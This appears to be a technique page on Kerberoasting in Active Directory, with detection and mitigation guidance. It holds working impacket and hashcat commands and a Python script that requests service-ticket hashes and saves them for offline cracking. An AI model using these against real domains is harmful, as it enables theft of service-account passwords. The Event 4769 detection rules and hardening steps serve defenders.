Kerberoasting

Active Directory

what is it?

Kerberoasting is an Active Directory attack that lets any authenticated domain user request Kerberos service tickets (TGS) for accounts that have a Service Principal Name (SPN) registered. The encrypted part of each ticket is protected with a key derived from the service account’s password (for RC4, that key is the account’s NTLM hash), so the tickets can be taken offline and cracked without any further interaction with the domain controller.

The attack is particularly effective because SPNs are often set on service accounts with weak passwords, and requesting a TGS is a normal, logged operation that blends in with everyday traffic.

requirements

  • Any valid domain user account (no elevated privileges needed)
  • Network access to the domain controller
  • At least one service account with an SPN registered

attack steps

1. enumerate SPNs

Find accounts with SPNs set using impacket or native tools:

# impacket
GetUserSPNs.py domain.local/user:password -dc-ip 10.0.0.1

# PowerShell (on-box)
setspn -T domain.local -Q */*

2. request and export tickets

# request tickets and dump to file for offline cracking
GetUserSPNs.py domain.local/user:password -dc-ip 10.0.0.1 -request -outputfile hashes.txt

3. crack offline

hashcat -m 13100 hashes.txt /path/to/wordlist.txt --rules-file best64.rule

-m 13100 is the hashcat mode for Kerberos 5 TGS-REP etype 23 (RC4).

full automation script

#!/usr/bin/env python3
# kerberoast.py — enumerate, request, and save TGS hashes
import subprocess
import argparse
import sys

def get_spns(domain, user, password, dc_ip):
    cmd = [
        "GetUserSPNs.py",
        f"{domain}/{user}:{password}",
        "-dc-ip", dc_ip,
        "-request",
        "-outputfile", "hashes.txt"
    ]
    print(f"[*] Targeting DC: {dc_ip}")
    print(f"[*] Enumerating SPNs for {domain}...")
    result = subprocess.run(cmd, capture_output=True, text=True)
    if result.returncode == 0:
        print("[+] Hashes saved to hashes.txt")
        print(result.stdout)
    else:
        print("[-] Failed:", result.stderr, file=sys.stderr)

if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument("domain")
    parser.add_argument("user")
    parser.add_argument("password")
    parser.add_argument("dc_ip")
    args = parser.parse_args()
    get_spns(args.domain, args.user, args.password, args.dc_ip)

detection

  • Event ID 4769 — Kerberos service ticket request. Look for one account requesting tickets for many distinct services in a short window, or for tickets whose Ticket Encryption Type is 0x17 (RC4) when AES is the domain default.
  • Honeypot SPNs — register a fake SPN on a decoy account with a strong password and alert on any TGS request for it; no legitimate client should ever ask for that ticket.
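
The three detection rules above, run over constructed 4769 records, as an added example that is not part of the original page. The records are constructed inline (field names follow the 4769 event XML); the decoy account name svc_decoy, the threshold and the window are assumptions.

```python
# Added example (not part of the original page): triage of Windows Security
# Event 4769 records for the Kerberoasting indicators described above.
# Records are constructed here; field names follow the 4769 event XML
# (TargetUserName = requesting account, ServiceName = service account whose
# ticket was requested, TicketEncryptionType = etype, Status = 0x0 on success).
from collections import defaultdict
from datetime import datetime, timedelta

RC4_ETYPE = "0x17"                 # etype 23, RC4-HMAC: the offline-crackable type
HONEYPOT_SERVICES = {"svc_decoy"}  # decoy account with a registered SPN (assumed name)
SPIKE_THRESHOLD = 5                # distinct services per requester per window
WINDOW = timedelta(minutes=10)

# Constructed sample: one normal AES request, one honeypot hit, and a burst of
# RC4 requests for many different services from a single account.
EVENTS = [
    {"time": "2024-01-01T09:00:00", "TargetUserName": "alice@CORP.LOCAL",
     "ServiceName": "svc_sql", "TicketEncryptionType": "0x12", "Status": "0x0"},
    {"time": "2024-01-01T09:01:00", "TargetUserName": "bob@CORP.LOCAL",
     "ServiceName": "svc_decoy", "TicketEncryptionType": "0x12", "Status": "0x0"},
] + [
    {"time": f"2024-01-01T09:02:{i:02d}", "TargetUserName": "mallory@CORP.LOCAL",
     "ServiceName": f"svc_app{i}", "TicketEncryptionType": "0x17", "Status": "0x0"}
    for i in range(6)
]

def triage_4769(events, aes_default=True):
    """Return a list of (rule, requester, detail) findings."""
    findings = []
    by_requester = defaultdict(list)
    for ev in events:
        if ev["Status"] != "0x0":      # failed requests yield no ticket to crack
            continue
        requester, svc = ev["TargetUserName"], ev["ServiceName"]
        if svc in HONEYPOT_SERVICES:
            findings.append(("honeypot_spn", requester, svc))
        if aes_default and ev["TicketEncryptionType"] == RC4_ETYPE:
            findings.append(("rc4_ticket", requester, svc))
        by_requester[requester].append((datetime.fromisoformat(ev["time"]), svc))
    # Spike rule: many distinct services requested by one account in a short window.
    for requester, reqs in by_requester.items():
        reqs.sort()
        for i, (t0, _) in enumerate(reqs):
            in_window = {s for t, s in reqs[i:] if t - t0 <= WINDOW}
            if len(in_window) >= SPIKE_THRESHOLD:
                findings.append(("spn_spike", requester, f"{len(in_window)} services"))
                break
    return findings
```

Feeding real 4769 exports into triage_4769 requires only mapping the event fields to the keys used here; the RC4 rule is disabled with aes_default=False for domains that still permit RC4 by policy.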

mitigation

  • Use Group Managed Service Accounts (gMSA) — passwords are 120 characters, auto-rotated, and uncrackable in practice.
  • Enforce AES-only Kerberos encryption on service accounts (msDS-SupportedEncryptionTypes) so a client cannot negotiate an RC4 ticket.
  • Audit accounts with SPNs regularly: a service account that can also log on interactively is a risk.

tools